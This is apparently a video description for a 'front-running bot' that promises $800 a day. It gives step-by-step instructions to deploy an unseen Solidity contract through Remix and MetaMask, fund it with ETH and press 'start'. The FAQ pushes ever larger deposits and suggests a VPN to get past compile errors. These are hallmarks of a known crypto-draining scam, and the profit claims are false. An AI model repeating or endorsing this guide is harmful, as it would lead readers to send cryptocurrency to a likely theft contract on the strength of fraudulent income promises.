How to make $800/Day Passively Through Ethereum Front-Running Bot!

10 months ago

Be sure to read the description to avoid any potential issues.

Ethereum's slower transactions and Uniswap's smart contract setup open an opportunity for front-running smart contracts in blockchain. We can exploit this to our advantage. In this video, I'll guide you through creating a Uniswap trading bot that can potentially earn over $800/day, capitalizing on these market conditions. Let's dive into this efficient and profitable approach.

Here's the step-by-step guide:

1. Download MetaMask(if you don't have) :

2. Access Remix:

3. Click on the "contracts" folder and then create a new file". Name it as you like, here we'll consider "bot.sol". The file name has to end with ".sol" which is the Solidity language extension.

4. Paste this code into Remix:

5. Move to the "Solidity Compiler" tab, select version "0.6.6" and then "Compile" it. (If you have trouble compiling, try accessing through VPN)

6. Move to the "Deploy" tab, select "Injected Web 3" environment, and then "Deploy" it. After the transaction is confirmed, the smart contract is deployed

7. Deposit funds to your bot contract's address

8. After confirming your transaction, start the bot by clicking the “start” button.

9. When you've accumulated profits, press "withdraw" to withdraw all the ETH from the contract

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I got messages from people who didn't fund the contract with enough to cover gas fees and possible burn fees. The bot targets tokens with 10% burn fees or less. Nowadays most tokens come with 3-6% fees. If you fund the contract with 0.5 ETH or less and the bot targets a token with high burn fees, the contract may lose more on fees than it can generate in profits. I recommend funding the contract with at least 0.6 - 1 ETH to guarantee this will not happen.


Q. Can I turn off my computer?
A. Yes. Once the smart contract has been deployed it lives on the blockchain. Just save the address and then you can import it into Remix just below the "Deploy" button by pasting in the contract address and pressing "At Address".

Q. I deployed the contract but it's not showing up in Remix, how do I import it?
A. Open your address in etherscan and find the contract address in the transaction log. Import it into remix just below the "Deploy" button by pasting in the contract address and pressing "At Address". If the button isn't clickable after entering the address, ensure there are no extra characters. Make sure you've compiled bot.sol (as per step 5).

Q. How can I give back to you?
A. Please subscribe to my channel and be on the lookout for my upcoming DeFi project and consider supporting

Q. Does this work on other chains like BSC?
A. It may but the code would need some adjustments (token and uniswap addresses). The bot likely won't be as profitable on alt-chains since they usually come with low fees and fast transactions. Frontrunning is so easy on Ethereum because of high fees and slow transactions.

Q. Is there a maximum ETH amount I can put in?
A. No. The more ETH you put in the larger orders you can frontrun. Eg. with 1 ETH you can only front-run orders worth 1 ETH or less. With 10 ETH you can frontrun orders of 10 ETH or less. So more ETH will always mean a higher profit potential. At extreme sizes like 1,000 ETH the benefit of more ETH may be marginal since there aren't that many orders of this size in the first place. But the bot scales pretty well up to 100 ETH so you're unlikely to hit the amounts at which more ETH doesn't help

Q. I'm getting an "Invalid input source specified" error when trying to compile. What should I do?
A. Connect VPN, delete the bot.sol file, refresh Remix, and then recreate the file again.

Q. The metamask confirmation dialog doesn't come up. What should I do?
A. Most likely you forgot to change the environment to "Injected Web 3" in the "Deploy" tab (step 6)

Q. My bot was making money but now it seems to have stalled. What's going on?
A. This usually happens when you put too little ETH into the contract. When market conditions change and average order sizes go up, the bot may be unable to find profitable trading opportunities anymore because of insufficient ETH. You can either wait for the market to cool down (and the issue will resolve) or add more ETH and "start" it again.


Deploying the contract more than once - you only have to deploy the contract once. There's no reason to waste gas deploying more than once. You should always reuse the contract you already have.

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